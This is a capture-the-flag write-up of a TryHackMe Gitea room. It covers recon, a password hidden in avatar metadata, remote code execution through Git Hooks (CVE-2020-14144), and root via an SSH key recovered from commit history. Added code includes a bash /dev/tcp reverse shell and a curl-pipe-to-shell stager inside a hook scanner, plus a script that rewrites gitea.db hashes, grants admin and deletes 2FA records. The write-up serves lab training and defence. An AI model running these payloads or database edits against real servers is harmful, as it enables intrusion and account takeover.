Ahhhhh man, so we are doing THM today. It has been a while, I know; I'm trying my best to keep the THM writeups coming without wasting too much time. Let's jump in already so the fun can begin.

We always start with an nmap scan…..
nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.84.166
# Nmap 7.91 scan initiated Fri Feb 18 07:49:36 2022 as: nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.84.166
Increasing send delay for 10.10.84.166 from 0 to 5 due to 11 out of 18 dropped probes since last increase.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 8399426 microseconds. Ignoring time.
[... the same RTTVAR / adjust_timeouts2 timing warnings repeat for the rest of the scan; the VPN link was laggy ...]
Nmap scan report for 10.10.84.166
Host is up (4.3s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp closed zeus-admin
Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Feb 18 07:55:24 2022 -- 1 IP address (1 host up) scanned in 347.80 seconds
Now we know we have just two open ports (9090 answered as closed rather than filtered). Let's throw in service detection and the default nmap scripts to see what we are dealing with. We already know 22 is SSH and 80 is HTTP, but there is no harm in confirming it.
nmap -sC -sV -oN nmap/normal.tcp -p 22,80 10.10.84.166
# Nmap 7.91 scan initiated Fri Feb 18 07:57:10 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p 22,80 10.10.84.166
Nmap scan report for 10.10.84.166
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http nginx
| http-title: Hello, World
|_Requested resource was http://10.10.84.166/index.html
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 18 07:58:53 2022 -- 1 IP address (1 host up) scanned in 103.06 seconds
Now that's better. Let's check what we have on HTTP.

Strange: just by opening the IP in the browser we got redirected to YouTube. Damn, we just got rickrolled XD. Let's use curl instead and look at the raw source.

Now let's add the hostname from the source to our /etc/hosts file.

Now that is cool: we have a Gitea instance. When I tried checking the version it seems to be hidden, so let's try to register an account.

Now we hit Sign Up and boom boom.

Now let's click on Explore to see what we have.

We have two repos. Let's see what we can dig out of the commit history; it is always worth checking, because "deleted" files and secrets usually still live in older commits.

Five commits. Now that should be interesting; everybody likes commits XD.

Now that is interesting, but who does that, hiding a password in an avatar? Ahhhh, let's confirm it.

So I downloaded the avatar to my machine to confirm whether scones is right about his password being hidden in it.

Now that should be easy: it seems scones' password is literally Password. Ahhhhhh, let's confirm it.
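Where to look when someone "hides" text in an image: the easy places are the metadata chunks, not the pixels. The following is an added example (not part of the original writeup, and not the room's actual avatar) that builds a small constructed PNG with a comment chunk, walks the chunk table to pull out every tEXt/zTXt/iTXt entry, and falls back to a `strings`-style scan for formats it does not parse (a JPEG avatar, for instance). Run it against the real file by swapping `SAMPLE_PNG` for `open(path, "rb").read()`.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Build one PNG chunk: length, type, body, CRC over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


# Constructed sample: a 1x1 RGB PNG carrying a tEXt comment (the "hidden"
# password) and a compressed zTXt chunk. This is NOT the avatar from the room.
SAMPLE_PNG = (
    PNG_SIG
    + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    + _chunk(b"tEXt", b"Comment\x00password: Password")
    + _chunk(b"zTXt", b"Note\x00\x00" + zlib.compress(b"nothing here"))
    + _chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))
    + _chunk(b"IEND", b"")
)


def png_text_chunks(data: bytes) -> dict:
    """Return {keyword: text} for every tEXt / zTXt / iTXt chunk in a PNG."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    found = {}
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC on {ctype!r} chunk")
        if ctype == b"tEXt":
            key, _, text = body.partition(b"\x00")
            found[key.decode("latin-1")] = text.decode("latin-1")
        elif ctype == b"zTXt":
            key, _, rest = body.partition(b"\x00")
            # rest[0] is the compression method (0 = zlib), then the deflate stream
            found[key.decode("latin-1")] = zlib.decompress(rest[1:]).decode("latin-1")
        elif ctype == b"iTXt":
            key, _, rest = body.partition(b"\x00")
            comp_flag, rest = rest[0], rest[2:]          # skip flag + method bytes
            _lang, _, rest = rest.partition(b"\x00")
            _trans_key, _, text = rest.partition(b"\x00")
            if comp_flag:
                text = zlib.decompress(text)
            found[key.decode("latin-1")] = text.decode("utf-8")
        pos += 12 + length
        if ctype == b"IEND":
            break
    return found


def printable_strings(data: bytes, min_len: int = 6) -> list:
    """`strings`-style fallback for any file type (JPEG avatars, EXIF blobs, etc.)."""
    out, cur = [], bytearray()
    for b in data:
        if 32 <= b < 127:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                out.append(cur.decode("ascii"))
            cur = bytearray()
    if len(cur) >= min_len:
        out.append(cur.decode("ascii"))
    return out


if __name__ == "__main__":
    for key, text in png_text_chunks(SAMPLE_PNG).items():
        print(f"{key}: {text}")
    for s in printable_strings(SAMPLE_PNG):
        print("strings:", s)
```

The CRC check matters in practice: a file that looks like a PNG but fails it has usually had bytes appended after IEND (the other classic hiding place), so a mismatch is itself a hint to look at the tail of the file.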

Boom, we are in. Going through the hydra repo I found nothing, but the Gitea version is hidden, so why not check whether our user has Git Hooks enabled? If so, that is a straightforward RCE: a user allowed to edit repository hooks can put arbitrary commands in post-receive and they run on the server as the Gitea service account (CVE-2020-14144, affecting Gitea up to 1.12.5). How do you know?? WTF, have some dignity and do some research XD, lol, just kidding.

The public exploit for it was published back in February 2021. I got the exploit code but decided to do it manually, so I understand what I am doing.

Now let's click on Settings >> Git Hooks >> post-receive.

So let's add our reverse-shell payload and update the hook.

Now let's move to the next step: start our ncat listener and make a commit to trigger our payload.

# create a throwaway repo with one file so there is something to push
touch shell.md
git init

git add shell.md
git commit -m "Initial commit"

# point it at the repo whose post-receive hook now carries our payload
git remote add origin http://git.git-and-crumpets.thm/scones/cant-touch-this.git
# the push prompts for scones' Gitea credentials; --force overwrites whatever
# is there, and post-receive fires on the server once the push is accepted
git push -u origin master --force
We give scones and Password as the credentials for the push, which triggers the hook, and boom, we have a reverse shell (as the Gitea service user, since that is who runs the hooks). Let's spawn a full TTY shell.
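The flip side of this technique for anyone defending a Gitea box: a hook edited through the web UI is just a script on disk in the repository, so the same payload is trivial to find if you look. The following is an added example (my own code, not from the writeup and not a Gitea component) that pairs a constructed post-receive hook of the kind used above (a bash reverse shell with placeholder address and port) with a small scanner that flags the usual shell-spawning patterns. `scan_hooks_dir` assumes Gitea keeps hooks under `hooks/` and `custom_hooks/` inside the bare repo; the exact filename for UI-edited hooks varies between versions, so it scans everything there rather than one path.

```python
import os
import re

# Constructed samples. MALICIOUS_HOOK is the shape of payload placed in
# post-receive above (address/port are placeholders); BENIGN_HOOK is a normal
# deploy hook that should not trip the scanner.
MALICIOUS_HOOK = """#!/bin/bash
bash -i >& /dev/tcp/10.9.1.2/4444 0>&1
"""

STAGER_HOOK = """#!/bin/sh
curl -s http://10.9.1.2/s.sh | sh
"""

BENIGN_HOOK = """#!/bin/bash
while read oldrev newrev refname; do
  echo "received $refname"
done
"""

# Patterns that have no business in a repository hook on a Gitea server.
# Order matters: the first match wins per line.
SUSPICIOUS = [
    (r"/dev/tcp/", "bash reverse shell"),
    (r"\b(nc|ncat)\b.*\s-e\b", "netcat -e shell"),
    (r"\bbash\s+-i\b", "interactive bash"),
    (r"\bbase64\s+(-d|--decode)\b", "base64-decoded stage"),
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "download-and-execute"),
    (r"\bpython[23]?\b.*\bsocket\b", "python socket shell"),
    (r"\bmkfifo\b.*\bnc\b", "fifo-backed netcat shell"),
]


def scan_hook(text: str) -> list:
    """Return [(line_no, label, line)] for each suspicious line in a hook script."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, label in SUSPICIOUS:
            if re.search(pattern, stripped):
                hits.append((no, label, stripped))
                break
    return hits


def scan_hooks_dir(repo_path: str) -> dict:
    """Scan every file under <repo>.git/hooks and custom_hooks (assumed Gitea layout).

    Returns {path: hits}. Git's own *.sample files are skipped; a missing
    directory simply contributes nothing.
    """
    results = {}
    for sub in ("hooks", "custom_hooks"):
        for root, _dirs, files in os.walk(os.path.join(repo_path, sub)):
            for name in files:
                if name.endswith(".sample"):
                    continue
                path = os.path.join(root, name)
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        hits = scan_hook(fh.read())
                except OSError:
                    continue
                if hits:
                    results[path] = hits
    return results


if __name__ == "__main__":
    for label, text in (("malicious", MALICIOUS_HOOK), ("stager", STAGER_HOOK),
                        ("benign", BENIGN_HOOK)):
        print(label, scan_hook(text))
```

On a real server you would point `scan_hooks_dir` at each directory under Gitea's repository root. The fix is not the scanner, though: the "Allow Git Hooks" permission should be granted to nobody who is not already trusted with shell on the box, because that is exactly what it amounts to.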

Now let's grab user.txt from the home directory.

Privilege Escalation
Going through the directories, the only promising one is /var/lib/gitea/data, where we find gitea.db. Let's check what is in it using sqlite3.

Now let's open the db file with sqlite3 (.tables and .schema user are handy to get your bearings).

Boom, let's dump the user table.

We know user scones is not an admin on Gitea, but since we have write access to gitea.db we can make any user an admin or change any user's password. Let's do that now.
select lower_name, is_admin from user;

Only hydra has admin. We can simply set is_admin to 1 for scones, which gives him admin privileges too. Let's update that now.
UPDATE user SET is_admin=1 WHERE lower_name='scones';

Now let's log back in to Gitea.

We are admin now; time to reset all the users' passwords.

Now I set a new password for each user and reset 2FA as well XD.


Now click Update User Account and we should be good; I did this for every user. We should see "User account has been updated".
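The admin flip above and the per-user password/2FA resets through the web UI can all be done straight in gitea.db, which is quieter and does not depend on the UI at all. The following is an added example of that (my own code, not from the writeup or from Gitea), working on a constructed in-memory copy of the relevant columns so it runs offline; point `sqlite3.connect` at the real file to use it. It assumes the password format of Gitea 1.11/1.12, the line affected by the hooks RCE: `passwd_hash_algo = 'pbkdf2'`, PBKDF2-HMAC-SHA256 with 10000 rounds and a 50-byte key, hex encoded, with a 10-character alphanumeric `salt`; newer releases changed this, so check `.schema user` and an existing `passwd` value before writing anything. The `two_factor` table name and its `uid` column are likewise assumptions to verify on the target.

```python
import hashlib
import hmac
import secrets
import sqlite3
import string

# Constructed stand-in for the parts of gitea.db this example touches.
# The real `user` table has many more columns.
SCHEMA = """
CREATE TABLE user (
    id INTEGER PRIMARY KEY,
    lower_name TEXT NOT NULL,
    name TEXT NOT NULL,
    passwd TEXT,
    passwd_hash_algo TEXT,
    salt TEXT,
    is_admin INTEGER DEFAULT 0
);
CREATE TABLE two_factor (
    id INTEGER PRIMARY KEY,
    uid INTEGER NOT NULL,
    secret TEXT
);
"""
SEED_USERS = [
    (1, "hydra", "hydra", "", "pbkdf2", "", 1),
    (2, "scones", "scones", "", "pbkdf2", "", 0),
    (3, "root", "root", "", "pbkdf2", "", 0),
]
SEED_2FA = [(1, 3, "JBSWY3DPEHPK3PXP")]   # root has TOTP enabled in the sample

# Assumed Gitea 1.11/1.12 parameters (verify against the target's hashes).
PBKDF2_ROUNDS, PBKDF2_KEYLEN, SALT_LEN = 10000, 50, 10


def gitea_hash(password: str, salt: str) -> str:
    """PBKDF2-HMAC-SHA256, hex encoded, as stored in user.passwd."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(),
                               PBKDF2_ROUNDS, PBKDF2_KEYLEN).hex()


def random_salt() -> str:
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(SALT_LEN))


def open_demo_db() -> sqlite3.Connection:
    """In-memory copy of the constructed schema; use sqlite3.connect(path) for real."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO user VALUES (?,?,?,?,?,?,?)", SEED_USERS)
    conn.executemany("INSERT INTO two_factor VALUES (?,?,?)", SEED_2FA)
    return conn


def admins(conn) -> list:
    return [r[0] for r in conn.execute(
        "SELECT lower_name FROM user WHERE is_admin=1 ORDER BY id")]


def make_admin(conn, lower_name: str) -> None:
    conn.execute("UPDATE user SET is_admin=1 WHERE lower_name=?", (lower_name,))
    conn.commit()


def set_password(conn, lower_name: str, new_password: str) -> None:
    """Replace a user's hash and salt so new_password logs in through the UI."""
    salt = random_salt()
    conn.execute(
        "UPDATE user SET passwd=?, passwd_hash_algo='pbkdf2', salt=? WHERE lower_name=?",
        (gitea_hash(new_password, salt), salt, lower_name))
    conn.commit()


def disable_2fa(conn, lower_name: str) -> int:
    """Drop the user's TOTP row; returns the number of rows removed."""
    cur = conn.execute(
        "DELETE FROM two_factor WHERE uid=(SELECT id FROM user WHERE lower_name=?)",
        (lower_name,))
    conn.commit()
    return cur.rowcount


def check_password(conn, lower_name: str, password: str) -> bool:
    row = conn.execute("SELECT passwd, salt FROM user WHERE lower_name=?",
                       (lower_name,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], gitea_hash(password, row[1]))


if __name__ == "__main__":
    db = open_demo_db()
    make_admin(db, "scones")
    set_password(db, "root", "NewPassw0rd!")
    disable_2fa(db, "root")
    print("admins:", admins(db))
```

Back up gitea.db before touching it, and do the writes while no push is in flight: sqlite will take the lock, but a half-applied change on a file the running service is also writing is the fast way to lose the foothold you just gained.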

Now we can use the new passwords to log in to each account and check their commits. I first went for user hydra but found nothing in the commits; let's check user root now.

Boom, we got a backup repo with some pushed and deleted commits, but the one about SSH with a password caught my eye. Let's check it out.

Four commits. Let's click on it and see what is in store for us.

Ahhhhhhhh awesome, let's see what we have on the SSH one.

Boom, we found a private key. Ahhhhhh, finally some progress. I quickly copied it and saved it on my attacking machine (chmod 600, or ssh will refuse it). Let's try it with the root user over SSH.

Boom, we are root and done. As for the private key passphrase, you already know it: Sup3rS3****, just look closely at the commits and that's all.
Greetings from Muzec